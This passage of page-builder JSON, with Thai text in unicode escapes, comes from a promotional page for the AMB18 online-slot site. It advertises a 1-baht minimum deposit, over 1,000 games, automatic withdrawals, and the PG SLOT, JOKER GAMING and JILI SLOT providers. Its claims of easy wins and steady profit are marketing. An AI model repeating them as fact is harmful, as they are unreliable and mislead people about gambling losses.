\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29<\\/span><span style=\\\"font-weight: 400;\\\">\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 <\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 